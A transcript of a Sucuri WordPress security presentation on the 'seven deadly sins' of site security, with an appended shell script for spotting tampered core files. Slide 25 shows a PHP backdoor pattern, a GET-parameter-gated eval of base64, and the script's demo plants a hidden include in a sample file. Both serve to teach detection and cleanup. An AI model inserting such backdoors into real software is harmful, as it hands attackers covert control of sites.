The document discusses Joseph Herbrandson's work as a researcher and account manager at Sucuri, a company that provides website security services including malware cleanup and attack protection. It outlines Sucuri's services like security scanning, malware cleanup, and blocking attacks. It also discusses common WordPress security issues like outdated plugins, weak passwords, and lack of backups. It describes the "seven deadly sins of WordPress security" including security apathy, lack of backups, and not keeping software updated. Throughout, it provides tips for improving WordPress security such as using a password manager, limiting user privileges, and installing security plugins.
1. The 7 Deadly Sins of WordPress Security
2. ABOUT ME
WEB DESIGN AND INFORMATION SECURITY
Committed to WordPress since 2008.
SUCURI – Researcher and Account Manager
Removing malware and protecting websites.
Personally cleaned over 5,000 websites
SUCURI.NET
Twitter: @JHerbrandson
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
3. ABOUT SUCURI
Over 45 Security Professionals Making a Safer Web
SECURITY SCANNING & ANALYSIS
Checking the health of over 3 Million websites
every month through our free
Sitecheck Scanner:
http://sitecheck.sucuri.net
MALWARE CLEANUP
Cleaning and remediating 300 – 400
hacked or infected websites every day.
ATTACK PROTECTION
Blocking over 33 million attacks and
instances of malicious traffic every month
EDUCATION
Providing detailed and actionable security
information through our blog at
http://blog.sucuri.net
5. A QUICK DEMO
Attack in Progress:
https://www.youtube.com/watch?v=v4Xr3LrixVg
6. Sooo… WHY?
It’s Just Business…probably
- The Short Answer: Fame and Fortune
- $BILLION Spam – Generic Pharmaceuticals, Payday Loans, Gambling,
Designer Brand Knock-Offs
- Hacktivism – Politics and religion at the speed of download
- Immaturity – Kids being kids
7. the 7 deadly sins of WordPress security
ONE: Security Apathy
TWO: Protection Lust
THREE: Thrill Seeking
FOUR: Access Aloofness
FIVE: Service Greed
SIX: Principle Pride
SEVEN: Vulnerability Wrath
8. sin #1
Security Apathy
Ignoring the Requirements
9. THE NEED FOR SECURITY
THE STATE OF THE INTERNET
www.internetlivestats.com
10. HOSTING OPTIONS
Choose wisely
Shared Hosting: Cheap
Dedicated Hosting: All yours
Managed Hosting: Done for you
12. SPEAKING OF ENVIRONMENT…
Who is using the Public Wifi?
13. sin #2
Protection Lust
Searching for the Security Holy Grail
14. WORD of WARNING
No chance of 0% risk.
The next ‘0-Day’ attack is always around the corner…
15. SECURITY HEADLINES
Proof: Seen the news lately?
16. sin #3
Thrill Seeking
Skydiving is a safer thrill than going without backups
17. BUT I’VE NEVER HAD A PROBLEM BEFORE…
Have a low profile, non-threatening
site? You are still getting attention
18. FREE WEBSITE REBRAND
HACKERS HARD AT WORK
PHARMACEUTICAL SPAM MAKES HACKERS TWO BILLION DOLLARS/YEAR
SOLUTION: OFFSITE BACKUPS
RESULT: CLEAN SITE IMMEDIATELY
19. AUTOMATED BACKUPS
Know you have a backup plan
BackupBuddy: ithemes.com/backupbuddy/
VaultPress: vaultpress.com
Sucuri Backups: sucuri.net
Web hosting backups: your hosting company
20. sin #4
Access Aloofness
Sticky Notes: No longer Best for Password Management!!
21. top 3 passwords used in 2013
Seriously….
Password     Last Year's Rank
'123456'     2
'password'   1
'12345678'   3
credit: SplashData.com
22. PASSWORD MANAGER
Remembers your passwords so you don't have to
LastPass: lastpass.com
1Password: agilebits.com
KeePass: keepass.info
Dashlane: dashlane.com
23. LEAST PRIVILEGE
Does your user setup look like this?
[Diagram: one actual admin, yet hosting control panel access, FTP/SFTP root access and WordPress Administrator, Editor and Contributor logins are handed out to writers, SEO guys, analysts, editors, friends and random people, with potential hackers in the mix, again and again.]
24. sin #5
Service Greed
No such thing as something for nothing on the front page of Google
25. NOT THE CODE YOU'RE LOOKING FOR…
Assisting the enemy
This probably shouldn't be in your theme:

    // a secret GET parameter gates a hidden eval() of a base64 payload
    if(isset($_GET['pwd'])) {
        eval(base64_decode("CiRhdXRoX3Bhc3MgPSAiN2U5NBhY3RpdmF0ZXMsIGNoYW5nZWQgZWxlbWVudHMgaW4gdGhlIG9yaWdpbmFsIHBsdWdpbiwgZGVzaWduZWQgdG8gYmVoYXZlIGxpa2UgY2xlYW4gY29kZSwgc2lnbmFsIHRoZSBoYWNrZXIgdG8gbGV0IGl0IGtub3cgdGhhdCBpdOKAmXMgaW4uIEEgY2xlYW4gYmFjayBkb29yIGhhcyBiZWVuIG9wZW5lZCwgYW5kIHlvdXIgc2l0ZSBpcyBub3cgb24gYW4gYXV0b21hdGVkIGF0dGFjayBsaXN0LCBtZWFudCB0byBxdWlldGx5IGluZmVjdCBhbmQgcmVpbmZlY3QgeW91ciBzaXRlIGFnYWluIGFuZCBhZw=="));
    }
26. MORE THAN EXPECTED
28. A SYSTEM TO LIVE BY
1. Protect! – Your computer has a firewall, why doesn’t your website?
2. Detect! – The same goes for AntiVirus.
3. Respond! – Clean up the mess. You have a backup right?
Encompassing Actions:
- Know the best practices
- Mind your maintenance
29. SYSTEM IN ACTION
30. sin #7
Wrath of Vulnerabilities
Opening doors you never knew existed
31. WORDPRESS CORE
Strong and Secure
Dedicated Creators: Making WordPress Solid and Secure
Auto-Updates: Get important patches right away.
Support: Everything you need at WordPress.org
32. WordPress Version Distribution
3.0 – 4.0 (wordpress.org/about/stats/)
33. 3rd Party VULNERABILITIES
Keep watch
Vulnerabilities disclosed at http://blog.sucuri.net
All-In-One SEO – 20 Million Downloads
WPtouch – 6 Million Downloads
MailPoet - 2.7 Million Downloads
Custom Contact Forms – 640k Downloads
Slider Revolution – Hundreds of Thousands (themeforest/codecanyon)
34. Going further
Transition from Mark to Master
Tips, Tools, and Services
35. WEBSITE ANTIVIRUS & FIREWALL
Protection and Detection
Don't be the mark! Understand the changes you are implementing
"AntiVirus": WordFence, Sucuri Website Antivirus
"Firewall": CloudFlare, Sucuri Website Firewall
"Utilities": iThemes Security, BruteProtect, Sucuri Security Plugin
36. RESOURCES
Because you don’t know what you don’t know
General WordPress Security:
https://codex.wordpress.org/Hardening_WordPress
https://blog.sucuri.net
Hacking and General Security:
http://www.securityfocus.com/
http://blogs.sophos.com/
Facebook Groups:
WordPress Security
Advanced WordPress
SubReddits:
Reddit.com/r/Hacking
Reddit.com/r/WordPress
37. EASY PATH TO CLEANUP
Response
NEED:
- Releases of WordPress at: https://wordpress.org/download/release-archive/
- Clean backup of active theme and required plugins
- New Passwords (WordPress, FTP, Hosting Control Panel, Everything Else)
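An added example, not from the slides: after unpacking the matching release from the archive above into a scratch directory, this shell script compares its core files against the live install and reports anything modified, added or missing, which is the first step of the cleanup the slide outlines. The tree layout and the tampered files in the demo are constructed, and the dropped file name is hypothetical.

```shell
#!/bin/sh
# Added example, not from the slides: compare a live WordPress install with a
# pristine unpack of the same version from the release archive and list every
# core file that was modified, added or removed. wp-content/ and wp-config.php
# are site-specific, so they are excluded here; check the theme and plugins
# against your clean backup instead. Versions must match, or every file that
# legitimately changed between releases shows up as MODIFIED.
set -eu

# core_manifest ROOT -> "sha256  ./relative/path" lines for core files only.
core_manifest() {
    (cd "$1" && find . -type f ! -path './wp-content/*' ! -name 'wp-config.php' \
        -exec sha256sum {} + | LC_ALL=C sort -k2)
}

# core_diff CLEAN_ROOT LIVE_ROOT -> prints sorted "ADDED|MODIFIED|MISSING path"
# lines; exit 0 only when the live core matches the clean one exactly.
core_diff() {
    clean=$(mktemp); live=$(mktemp)
    core_manifest "$1" > "$clean"
    core_manifest "$2" > "$live"
    report=$(awk '
        FILENAME == ARGV[1] { want[$2] = $1; next }
        {
            seen[$2] = 1
            if (!($2 in want))       print "ADDED    " $2
            else if (want[$2] != $1) print "MODIFIED " $2
        }
        END { for (p in want) if (!(p in seen)) print "MISSING  " p }
    ' "$clean" "$live" | LC_ALL=C sort)
    rm -f "$clean" "$live"
    [ -n "$report" ] || return 0
    printf '%s\n' "$report"
    return 1
}

# demo_core_diff -> constructs a clean tree and a tampered live tree (sample
# data, not real WordPress files), prints core_diff's report and returns its
# exit status.
demo_core_diff() {
    base=$(mktemp -d)
    for t in clean live; do
        mkdir -p "$base/$t/wp-admin" "$base/$t/wp-includes" "$base/$t/wp-content/themes/mytheme"
        printf '<?php require "wp-blog-header.php";\n' > "$base/$t/index.php"
        printf '<?php $wp_version = "4.0";\n' > "$base/$t/wp-includes/version.php"
        printf '<?php // admin\n' > "$base/$t/wp-admin/admin.php"
        printf '<?php // theme, site-specific, not compared here\n' > "$base/$t/wp-content/themes/mytheme/functions.php"
    done
    # Tamper with the "live" copy the way a cleanup typically finds it.
    printf '<?php @include "wp-content/uploads/.x.php"; require "wp-blog-header.php";\n' > "$base/live/index.php"
    printf '<?php // dropped file, hypothetical name\n' > "$base/live/wp-includes/class-wp-helper.php"
    rm "$base/live/wp-admin/admin.php"
    printf '<?php define("DB_NAME", "wp");\n' > "$base/live/wp-config.php"   # ignored by design
    printf '<?php // edited theme\n' > "$base/live/wp-content/themes/mytheme/functions.php"   # ignored by design
    status=0
    core_diff "$base/clean" "$base/live" || status=$?
    rm -rf "$base"
    return $status
}

demo_core_diff || echo "core differs from the clean release: reinstall core, then audit wp-content"
```

Replace every MODIFIED or ADDED core file from the clean copy (or reinstall core wholesale from the release archive), restore the theme and plugins from the clean backup, then rotate every password on the slide's list; a reinstalled core behind the old credentials is just a fresh target.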